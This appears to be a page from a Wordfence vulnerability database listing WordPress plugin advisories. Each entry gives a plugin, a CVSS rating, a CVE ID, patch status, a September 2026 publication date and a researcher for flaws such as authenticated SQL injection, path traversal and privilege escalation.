<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-76556" target="_blank" rel="noopener noreferrer">							CVE-2026-76556						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-import-export-lite" target="_blank" rel="noopener">WP Import Export Lite</a> <span class="wfvr-software-slug">[wp-import-export-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mak3bread" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/6a757d7b79b347554dafd0b3534c2218.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6a757d7b79b347554dafd0b3534c2218"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mak3bread" target="_blank" rel="noopener">mak3bread</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2d379440-3574-49af-ba56-10cdae65c756" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/37667434-23b0-4094-a602-29f16ece90e4" target="_blank" rel="noopener">Issues and Series for Newspapers, Magazines, Publishers, Writers &lt;= 3.1.3 &#8211; Authenticated (Administrator+) SQL Injection</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66630" target="_blank" rel="noopener noreferrer">							CVE-2026-66630						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/organize-series" target="_blank" rel="noopener">Issues and Series for Newspapers, Magazines, Publishers, Writers</a> <span class="wfvr-software-slug">[organize-series]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/37667434-23b0-4094-a602-29f16ece90e4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7011f426-4eae-4a8a-b0ad-819981a77a1f" target="_blank" rel="noopener">MoreConvert Wishlist for WooCommerce &lt;= 1.9.21 &#8211; Authenticated (Administrator+) SQL Injection</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66631" target="_blank" rel="noopener noreferrer">							CVE-2026-66631						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/smart-wishlist-for-more-convert" target="_blank" rel="noopener">MoreConvert Wishlist for WooCommerce</a> <span class="wfvr-software-slug">[smart-wishlist-for-more-convert]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7011f426-4eae-4a8a-b0ad-819981a77a1f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8d83dd7e-d331-4de0-bd64-69fc5c6b4121" target="_blank" rel="noopener">Newsletters &lt;= 4.18 &#8211; Authenticated (Administrator+) SQL Injection</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66619" target="_blank" rel="noopener noreferrer">							CVE-2026-66619						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/newsletters-lite" target="_blank" rel="noopener">Newsletters</a> <span class="wfvr-software-slug">[newsletters-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8d83dd7e-d331-4de0-bd64-69fc5c6b4121" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5d132ef1-a538-4be6-9031-2271d421f5bd" target="_blank" rel="noopener">NEX-Forms &lt;= 9.3.0 &#8211; Authenticated (Administrator+) SQL Injection via &#8216;operator&#8217; Key of the &#8216;additional_params&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-75961" target="_blank" rel="noopener noreferrer">							CVE-2026-75961						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/nex-forms-express-wp-form-builder" target="_blank" rel="noopener">NEX-Forms – Ultimate Forms Plugin for WordPress</a> <span class="wfvr-software-slug">[nex-forms-express-wp-form-builder]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5d132ef1-a538-4be6-9031-2271d421f5bd" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5e68356c-39f5-477c-87c7-65e751218a13" target="_blank" rel="noopener">SKT Addons for Elementor &lt;= 4.0 &#8211; Authenticated (Editor+) SQL Injection</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66626" target="_blank" rel="noopener noreferrer">							CVE-2026-66626						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/skt-addons-for-elementor" target="_blank" rel="noopener">SKT Addons for Elementor</a> <span class="wfvr-software-slug">[skt-addons-for-elementor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5e68356c-39f5-477c-87c7-65e751218a13" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c664b2b3-7ecf-4bd7-8623-3e882acfd945" target="_blank" rel="noopener">Store Exporter &lt;= 2.8.0 &#8211; Authenticated (Shop Manager+) Path Traversal to Arbitrary File Read and Arbitrary File Deletion via &#8216;filename&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16777" target="_blank" rel="noopener noreferrer">							CVE-2026-16777						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-exporter" target="_blank" rel="noopener">Store Exporter – Export WooCommerce Products, Orders, Subscriptions, Customers</a> <span class="wfvr-software-slug">[woocommerce-exporter]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c664b2b3-7ecf-4bd7-8623-3e882acfd945" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/928df20e-6c5b-46a4-a814-28d15cb0e1c2" target="_blank" rel="noopener">WC Vendors – WooCommerce Multivendor, WooCommerce Marketplace, Product Vendors &lt;= 2.7.2.1 &#8211; Authenticated (Administrator+) SQL Injection</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66625" target="_blank" rel="noopener noreferrer">							CVE-2026-66625						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wc-vendors" target="_blank" rel="noopener">WC Vendors – WooCommerce Multivendor, WooCommerce Marketplace, Product Vendors</a> <span class="wfvr-software-slug">[wc-vendors]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/928df20e-6c5b-46a4-a814-28d15cb0e1c2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8a3f0895-02e4-4661-8741-cd1a144dbf8f" target="_blank" rel="noopener">WP Maps – Google Maps,OpenStreetMap,Mapbox,Store Locator,Listing,Directory &amp; Filters &lt;= 4.9.9 &#8211; Authenticated (Administrator+) SQL Injection</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66618" target="_blank" rel="noopener noreferrer">							CVE-2026-66618						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-google-map-plugin" target="_blank" rel="noopener">WP Maps – Google Maps, OpenStreetMap, Mapbox, Store Locator with Search, Filters &amp; Listings</a> <span class="wfvr-software-slug">[wp-google-map-plugin]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8a3f0895-02e4-4661-8741-cd1a144dbf8f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ab77ca73-725e-4681-8bc6-54d95b871342" target="_blank" rel="noopener">WP Mega Menu &lt;= 1.4.2 &#8211; Authenticated (Administrator+) SQL Injection</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-92465" target="_blank" rel="noopener noreferrer">							CVE-2026-92465						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-megamenu" target="_blank" rel="noopener">WP Mega Menu</a> <span class="wfvr-software-slug">[wp-megamenu]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ab77ca73-725e-4681-8bc6-54d95b871342" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4da302ab-8a5d-481b-8b28-a798e0982893" target="_blank" rel="noopener">WP Optimizer &lt;= 2.5.0 &#8211; Authenticated (Administrator+) SQL Injection via &#8216;s&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-6295" target="_blank" rel="noopener noreferrer">							CVE-2026-6295						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-optimizer" target="_blank" rel="noopener">WP Optimizer – PageSpeed, Cache, Minify &amp; Core Web Vitals</a> <span class="wfvr-software-slug">[wp-optimizer]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/a1" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/08527e440d77f24880a4d8811a7f8d7d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="08527e440d77f24880a4d8811a7f8d7d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/a1" target="_blank" rel="noopener">san6051</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4da302ab-8a5d-481b-8b28-a798e0982893" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/755efea0-b538-44a0-b00a-83b75523bba6" target="_blank" rel="noopener">WP-Lister Lite for eBay &lt;= 3.8.11 &#8211; Authenticated (Shop Manager+) SQL Injection</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66628" target="_blank" rel="noopener noreferrer">							CVE-2026-66628						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-lister-for-ebay" target="_blank" rel="noopener">WP-Lister Lite for eBay</a> <span class="wfvr-software-slug">[wp-lister-for-ebay]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/755efea0-b538-44a0-b00a-83b75523bba6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/924d7a5b-c5a1-47c5-9524-30230bfd2d05" target="_blank" rel="noopener">WPMasterToolKit (WPMTK) – All in one plugin &lt;= 2.22.0 &#8211; Authenticated (Administrator+) SQL Injection</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66624" target="_blank" rel="noopener noreferrer">							CVE-2026-66624						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpmastertoolkit" target="_blank" rel="noopener">WPMasterToolKit (WPMTK) – All in one plugin</a> <span class="wfvr-software-slug">[wpmastertoolkit]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/924d7a5b-c5a1-47c5-9524-30230bfd2d05" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/062205fa-90a4-49c3-9b27-cd34217bd8ac" target="_blank" rel="noopener">All-in-One WP Migration and Backup &lt;= 7.110 &#8211; Authenticated (Admin+) Privilege Escalation</a></h4>
<div class="cvss-score-badge">4.7</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.7 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81810" target="_blank" rel="noopener noreferrer">							CVE-2026-81810						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/all-in-one-wp-migration" target="_blank" rel="noopener">All-in-One WP Migration and Backup</a> <span class="wfvr-software-slug">[all-in-one-wp-migration]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/charles-vosburgh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7ca13d60571fa21c6a24a25447a74480.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7ca13d60571fa21c6a24a25447a74480"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/charles-vosburgh" target="_blank" rel="noopener">Charles Vosburgh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/062205fa-90a4-49c3-9b27-cd34217bd8ac" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/54a0cdbd-4c3d-4bdd-98fa-f99715fd80bb" target="_blank" rel="noopener">Design Scuole Italia &lt;= 2.17.3 &#8211; Open Redirect</a></h4>
<div class="cvss-score-badge">4.7</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
